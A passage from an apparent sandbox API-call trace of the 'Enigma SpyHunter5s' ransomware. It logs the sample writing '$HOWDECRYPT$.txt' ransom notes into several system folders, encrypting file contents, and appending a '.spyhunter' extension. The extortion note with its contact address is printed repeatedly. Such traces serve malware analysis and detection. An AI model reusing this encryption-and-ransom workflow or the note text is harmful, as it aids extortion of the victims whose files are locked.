(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.023] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f12c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f12c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.023] CloseHandle (hObject=0x178) returned 1 [0147.023] GetProcessHeap () returned 0x2c0000 [0147.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fca0 | out: hHeap=0x2c0000) returned 1 [0147.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0c8 | out: pbBuffer=0x248f0c8) returned 1 [0147.023] GetProcessHeap () returned 0x2c0000 [0147.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.023] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f0c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f0c0*=0x30) returned 1 [0147.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\.." (normalized: "c:\\users\\all users\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.023] GetProcessHeap () returned 0x2c0000 [0147.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.023] GetProcessHeap () returned 0x2c0000 [0147.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e848 | out: hHeap=0x2c0000) returned 1 [0147.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0c8 | out: pbBuffer=0x248f0c8) returned 1 [0147.023] GetProcessHeap () returned 0x2c0000 [0147.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f0c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f0c0*=0x30) returned 1 [0147.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.024] GetProcessHeap () returned 0x2c0000 [0147.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.024] GetProcessHeap () returned 0x2c0000 [0147.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e7a0 | out: hHeap=0x2c0000) returned 1 [0147.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.024] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.024] WriteFile (in: hFile=0x178, lpBuffer=0x248eff7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f120, lpOverlapped=0x0 | out: lpBuffer=0x248eff7*, lpNumberOfBytesWritten=0x248f120*=0x127, lpOverlapped=0x0) returned 1 [0147.025] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.025] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f120, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f120*=0x2ac, lpOverlapped=0x0) returned 1 [0147.025] CloseHandle (hObject=0x178) returned 1 [0147.027] GetProcessHeap () returned 0x2c0000 [0147.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fbd8 | out: hHeap=0x2c0000) returned 1 [0147.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.028] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.028] WriteFile (in: hFile=0x178, lpBuffer=0x248eff3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f11c, lpOverlapped=0x0 | out: lpBuffer=0x248eff3*, lpNumberOfBytesWritten=0x248f11c*=0x127, lpOverlapped=0x0) returned 1 [0147.028] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.029] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f11c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f11c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.029] CloseHandle (hObject=0x178) returned 1 [0147.029] GetProcessHeap () returned 0x2c0000 [0147.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a68 | out: hHeap=0x2c0000) returned 1 [0147.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.029] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.029] WriteFile (in: hFile=0x178, lpBuffer=0x248efef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f118, lpOverlapped=0x0 | out: lpBuffer=0x248efef*, lpNumberOfBytesWritten=0x248f118*=0x127, lpOverlapped=0x0) returned 1 [0147.030] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.030] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f118, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f118*=0x2ac, lpOverlapped=0x0) returned 1 [0147.030] CloseHandle (hObject=0x178) returned 1 [0147.030] GetProcessHeap () returned 0x2c0000 [0147.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fb10 | out: hHeap=0x2c0000) returned 1 [0147.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.031] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.031] WriteFile (in: hFile=0x178, lpBuffer=0x248efeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f114, lpOverlapped=0x0 | out: lpBuffer=0x248efeb*, lpNumberOfBytesWritten=0x248f114*=0x127, lpOverlapped=0x0) returned 1 [0147.032] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.032] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f114, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f114*=0x2ac, lpOverlapped=0x0) returned 1 [0147.032] CloseHandle (hObject=0x178) returned 1 [0147.032] GetProcessHeap () returned 0x2c0000 [0147.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6a08 | out: hHeap=0x2c0000) returned 1 [0147.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.033] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.033] WriteFile (in: hFile=0x178, lpBuffer=0x248efe7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f110, lpOverlapped=0x0 | out: lpBuffer=0x248efe7*, lpNumberOfBytesWritten=0x248f110*=0x127, lpOverlapped=0x0) returned 1 [0147.033] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.033] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f110, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f110*=0x2ac, lpOverlapped=0x0) returned 1 [0147.033] CloseHandle (hObject=0x178) returned 1 [0147.034] GetProcessHeap () returned 0x2c0000 [0147.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feeb90 | out: hHeap=0x2c0000) returned 1 [0147.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.035] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.035] WriteFile (in: hFile=0x178, lpBuffer=0x248efe3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f10c, lpOverlapped=0x0 | out: lpBuffer=0x248efe3*, lpNumberOfBytesWritten=0x248f10c*=0x127, lpOverlapped=0x0) returned 1 [0147.035] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.036] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f10c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f10c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.036] CloseHandle (hObject=0x178) returned 1 [0147.036] GetProcessHeap () returned 0x2c0000 [0147.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30180 | out: hHeap=0x2c0000) returned 1 [0147.036] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0a8 | out: pbBuffer=0x248f0a8) returned 1 [0147.036] GetProcessHeap () returned 0x2c0000 [0147.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.036] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f0a0*=0x30) returned 1 [0147.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.044] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 107 [0147.044] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".txt") returned 0x0 [0147.044] GetProcessHeap () returned 0x2c0000 [0147.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0147.044] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f064*=0x2800, lpOverlapped=0x0) returned 1 [0147.098] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.098] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f064*=0x2800, lpOverlapped=0x0) returned 1 [0147.098] GetProcessHeap () returned 0x2c0000 [0147.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0147.098] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.098] WriteFile (in: hFile=0xa0, lpBuffer=0x248f0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x248f0a4*, lpNumberOfBytesWritten=0x248f064*=0x4, lpOverlapped=0x0) returned 1 [0147.112] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f064*=0x30, lpOverlapped=0x0) returned 1 [0147.113] CloseHandle (hObject=0xa0) returned 1 [0147.113] GetProcessHeap () returned 0x2c0000 [0147.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.113] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.spyhunter") returned 117 [0147.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.spyhunter")) returned 1 [0147.113] GetProcessHeap () returned 0x2c0000 [0147.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.114] GetProcessHeap () returned 0x2c0000 [0147.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.114] GetProcessHeap () returned 0x2c0000 [0147.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0618 | out: hHeap=0x2c0000) returned 1 [0147.114] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0a8 | out: pbBuffer=0x248f0a8) returned 1 [0147.114] GetProcessHeap () returned 0x2c0000 [0147.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.114] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f0a0*=0x30) returned 1 [0147.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.114] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 80 [0147.114] StrStrW (lpFirst="Help_CValidator.H1D", lpSrch=".txt") returned 0x0 [0147.115] GetProcessHeap () returned 0x2c0000 [0147.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.115] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f064*=0x2800, lpOverlapped=0x0) returned 1 [0147.127] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.127] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f064, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f064*=0x2800, lpOverlapped=0x0) returned 1 [0147.127] GetProcessHeap () returned 0x2c0000 [0147.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.127] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 